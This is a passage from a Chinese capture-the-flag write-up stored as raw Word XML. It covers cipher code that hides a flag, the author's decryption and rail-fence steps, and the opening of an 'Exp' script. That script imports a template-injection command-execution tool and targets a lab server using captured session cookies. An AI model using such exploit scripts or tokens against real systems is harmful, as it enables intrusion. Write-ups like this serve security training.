      </w:r>
    </w:p>
    <w:p w14:paraId="045E237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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A833B4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return '&lt;pre&gt;' + code_content + '&lt;/pre&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07863C0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@app.route('/PPPYthOn__c00De', methods=['GET'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BACB7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def content():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B662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code_content = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B81B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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B701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substitution_box = [54, 132, 138, 83, 16, 73, 187, 84, 146, 30, 95, 21, 148, 63, 65, 189, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA807C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188, 151, 72, 161, 116, 63, 161, 91, 37, 24, 126, 107, 87, 30, 117, 185, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624067C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98, 90, 0, 42, 140, 70, 86, 0, 42, 150, 54, 22, 144, 153, 36, 90, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA974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149, 54, 156, 8, 59, 40, 110, 56, 1, 84, 103, 22, 65, 17, 190, 41, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9A7E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99, 151, 119, 124, 68, 17, 166, 125, 95, 65, 105, 133, 49, 19, 138, 29, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA219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110, 7, 81, 134, 70, 87, 180, 78, 175, 108, 26, 121, 74, 29, 68, 162, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447FA1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142, 177, 143, 86, 129, 101, 117, 41, 57, 34, 177, 103, 61, 135, 191, 74, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851586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69, 147, 90, 49, 135, 124, 106, 19, 89, 38, 21, 41, 17, 155, 83, 38, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B88B4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#                     159, 179, 19, 157, 68, 105, 151, 166, 171, 122, 179, 114, 52, 183, 89, 107, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C32CC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113, 65, 161, 141, 18, 121, 95, 4, 95, 101, 81, 156, 17, 190, 38, 84, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99CB5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9, 171, 180, 59, 45, 15, 34, 89, 75, 164, 190, 140, 6, 41, 188, 77, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1AF53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165, 105, 5, 107, 31, 183, 107, 141, 66, 63, 10, 9, 125, 50, 2, 153, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F122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    156, 162, 186, 76, 158, 153, 117, 9, 77, 156, 11, 145, 12, 169, 52, 57, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A9539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        161, 7, 158, 110, 191, 43, 82, 186, 49, 102, 166, 31, 41, 5, 189, 27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7A7E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def shuffle_elements(perm, items):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF06A8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return list(map(lambda x: items[x], perm))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432DC2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def xor_sum_mod(a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E34F00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combine = lambda x, y: x + y - 2 * (x &amp; y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA16C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result = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127904B9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for i in range(len(a)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B6EFA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result += chr(combine(ord(a[i]), ord(b[i])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015516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return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDFE36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def generate_subkeys(original):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1423FF9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permuted = shuffle_elements(substitution_box, original)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410685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grouped_bits = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480C04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for i in range(0, len(permuted), 7):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5E483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grouped_bits.append(permuted[i:i + 7] + [1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05B56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compressed_keys = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C420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for group in grouped_bits[:32]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EB13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position = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF118D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value = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0252E12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for bit in group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40953292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value += (bit &lt;&lt; position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1DFD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position += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5DD1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compressed_keys.append((0x10001 ** value) % 0x7f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF202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return compressed_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B17AD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def bytes_to_binary_list(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C281E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byte_data = [ord(char) for char in data]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FED8E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total_bits = len(byte_data) * 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5040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binary_list = [0] * total_bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07FA5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position = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B191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for byte in byte_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D95F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for i in range(8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218FEBA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binary_list[(position &lt;&lt; 3) + i] = (byte &gt;&gt; i) &amp; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FDF9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position += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841D56F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return binary_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A5EFE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lastRenderedPageBreak/>
        <w:t># class ISCC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F105A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def __init__(self, secret_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61737D6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if len(secret_key) != 24 or not isinstance(secret_key, bytes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E1A0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raise ValueError("Error.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58667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self.secret_key = secret_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5EBAD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self.prepare_keys()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933AAD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def prepare_keys(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EE6C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binary_key = bytes_to_binary_list(self.secret_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858623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all_keys = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCD6F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for _ in range(8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649056D0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binary_key = generate_subkeys(binary_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F5E87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all_keys.extend(binary_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA294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binary_key = bytes_to_binary_list(''.join([chr(num) for num in binary_key[:24]]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE402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self.round_keys = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20806E0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for i in range(32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09525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self.round_keys.append(''.join(map(chr, all_keys[i * 8: i * 8 + 8])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A99B7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def process_block(self, data_block, encrypting=True):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF0538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assert len(data_block) == 16, "Error."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38040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left_half, right_half = data_block[:8], data_block[8:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF030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for round_key in self.round_keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53238A24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    left_half, right_half = right_half, xor_sum_mod(left_half, round_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15777141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return right_half + left_half</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22408CDA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def encrypt(self, plaintext):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168508D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if len(plaintext) % 16 != 0 or not isinstance(plaintext, bytes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E70465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raise ValueError("Plaintext must be a multiple of 16 bytes.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA061F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encrypted_text = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC3C2C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for i in range(0, len(plaintext), 16):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD10DE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    encrypted_text += self.process_block(plaintext[i:i+16], True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777CE6EB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    return encrypted_text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3B026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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41794F23" w14:textId="77777777" w:rsidR="00956FFE" w:rsidRPr="00956FFE" w:rsidRDefault="00956FFE" w:rsidP="00956F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56FFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#     return '&lt;pre&gt;' + code_content + '&lt;/pre&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53379BA6" w14:textId="418A5DEE" w:rsidR="00956FFE" w:rsidRDefault="00956FFE"/>
    <w:p w14:paraId="55F497A1" w14:textId="535F682A" w:rsidR="00937D58" w:rsidRDefault="00937D58">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一部分大概率是flag3的加密过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D330294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&lt;pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6A62F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from Crypto.Util.Padding import pad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952185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from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B9A96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from Crypto.Random import get_random_bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E6716A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lastRenderedPageBreak/>
        <w:t>from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5899D256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class Mode(Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20271D7D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ECB = 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2FBA3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CBC = 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C4AAB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CFB = 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E973A4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class Cipher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706152C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def __init__(self, key, iv=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F671478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self.BLOCK_SIZE = 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089377B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self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B223524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self.DELTA = 0x9e3779b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D563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self.IV = iv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C01414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self.ROUNDS = 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF164A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if self.IV:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96D23F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self.mode = Mode.CBC if iv else Mode.ECB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CB206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if len(self.IV) * 8 != self.BLOCK_SIZE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361662AD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self.mode = Mode.CFB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D4602A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def _xor(self, a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5579F283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return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425981D4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def encrypt_block(self, msg):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED66D9D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m0 = b2l(msg[:4])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03382ACE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m1 = b2l(msg[4:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEE399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msk = (1 &lt;&lt; (self.BLOCK_SIZE//2)) - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE385B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s = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4C862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for i in range(self.ROUNDS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4842D3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s += self.DELTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15386FCC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m0 += ((m1 &lt;&lt; 4) + self.KEY[i % len(self.KEY)]) ^ (m1 + s) ^ ((m1 &gt;&gt; 5) + self.KEY[(i+1) % len(self.KEY)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125A21A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m0 &amp;= msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC893BE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m1 += ((m0 &lt;&lt; 4) + self.KEY[(i+2) % len(self.KEY)]) ^ (m0 + s) ^ ((m0 &gt;&gt; 5) + self.KEY[(i+3) % len(self.KEY)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8A0C3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m1 &amp;= msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C3049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return l2b((m0 &lt;&lt; (self.BLOCK_SIZE//2)) | m1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F51306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def encrypt(self, msg):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE790FE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msg = pad(msg, self.BLOCK_SIZE//8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B22282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blocks = [msg[i:i+self.BLOCK_SIZE//8] for i in range(0, len(msg), self.BLOCK_SIZE//8)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2C4F3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ct = b''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA4B15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if self.mode == Mode.ECB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F564C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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E6A23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ct += self.encrypt_block(pt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EABA52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elif self.mode == Mode.CBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFAD47F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X = self.IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6FDF4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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B39501B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lastRenderedPageBreak/>
        <w:t>                enc_block = self.encrypt_block(self._xor(X, pt))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C30D2E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ct += enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD4A72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X = enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DBBC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elif self.mode == Mode.CFB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33988167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X = self.IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA91F49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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F222FAC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output = self.encrypt_block(X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BD8F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enc_block = self._xor(output, pt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E47FA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ct += enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC2507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        X = enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655543E6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    return ct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131ABDE7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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3F74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KEY = get_random_bytes(16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41610BCC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IV = get_random_bytes(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E57C4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cipher = Cipher(KEY, IV)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849DF0F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FLAG = b'xxxxxxxxxxxxxxxxxxx'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF08A8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ct = cipher.encrypt(FLAG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBF671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# KEY: 3362623866656338306539313238353733373566366338383563666264386133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A05A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 xml:space="preserve">    print(f'KEY: </w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KEY.hex()</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062683ED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# IV: 64343537373337663034346462393931</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FC27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 xml:space="preserve">    print(f'IV: </w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IV.hex()</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F30407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    # Ciphertext: 1cb8db8cabe8edbbddb236d5eb6f0cdeb610e9af855b52d3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE4302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 xml:space="preserve">    print(f'Ciphertext: </w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ct.hex()</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D5BA0" w14:textId="77777777" w:rsidR="00937D58" w:rsidRPr="00937D58" w:rsidRDefault="00937D58" w:rsidP="00937D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7D58">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E021FF" w14:textId="31A39859" w:rsidR="00937D58" w:rsidRDefault="005E418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此代码实现了一种简单的分组加密算法，结合了自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Feistel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>结构和不同的分组加密模式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ECB, CBC, CFB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）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7C61B42F" w14:textId="097C27AF" w:rsidR="005E4185" w:rsidRDefault="005E418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那么跟着思路写解密脚本，然后泡一下就行了，具体位脚本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</w:p>
    <w:p w14:paraId="2D40237E" w14:textId="2DBB2E80" w:rsidR="005E4185" w:rsidRDefault="005E4185">
      <w:r w:rsidRPr="005E4185">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F3B5A7" wp14:editId="181F5A09">
            <wp:extent cx="5274310" cy="293370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="85697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9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1F01" w14:textId="15485C6B" w:rsidR="005E4185" w:rsidRDefault="005E4185">
      <w:r w:rsidRPr="005E4185">
        <w:t>Flag[3]: CFCYm6Gs*}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8C4ED" w14:textId="42F41D8D" w:rsidR="005E4185" w:rsidRDefault="005E4185">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着把flag0-3连接起来：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A066BC" w14:textId="269B0FAA" w:rsidR="005E4185" w:rsidRDefault="005E4185" w:rsidP="005E4185">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00740925">
        <w:t>I{DSK6Fj7c</w:t>
      </w:r>
      <w:r w:rsidRPr="00956FFE">
        <w:t>SHvVBCB9XaC5f_Y*4CI6</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4185">
        <w:t>CFCYm6Gs*}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225796A" w14:textId="0089657E" w:rsidR="005E4185" w:rsidRDefault="005E4185" w:rsidP="005E4185">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一眼栅栏密文，直接解密就行了：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DBD0E" w14:textId="4E331315" w:rsidR="005E4185" w:rsidRPr="005E4185" w:rsidRDefault="000C7D81" w:rsidP="005E4185">
      <w:r w:rsidRPr="000C7D81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186FDFF4" wp14:editId="23C08DA4">
            <wp:extent cx="5274310" cy="2344420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="60028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8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BAF" w14:textId="09920681" w:rsidR="005E4185" w:rsidRDefault="005E4185"/>
    <w:p w14:paraId="7093266A" w14:textId="714A54EB" w:rsidR="000C7D81" w:rsidRDefault="000C7D81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B5F6E" w14:textId="2E47EB62" w:rsidR="000C7D81" w:rsidRDefault="000C7D81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本一：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41251C00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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>functools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B00C48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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D40FA8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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D697048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fenjing </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56FF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exec_cmd_payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105423D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"http://101.200.138.180:16356/evlelLL/646979696775616e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAEDF7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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookies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117BB00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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'csrftoken'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'eFj8KW8MwNkoIpmEivaIJdVzFYc2l4fqZRJN7R0HgBLykAqslXVdvEu6DFkhQbL8'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66DD786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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'td_cookie'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'2258944894'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EF22F6F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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'session'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'eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.Zk8RFw.UDQvuzm2G_y34W2AU-bxaCf3rj0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12838D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D4D83F9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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>po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{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"http"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56FFB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"https"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56FFB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CCD9CD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F56FFB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>functools</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56FFB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.lru_cache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56FF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ACC4824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DCDCAA"/>
          <w:kern w:val="0"/>
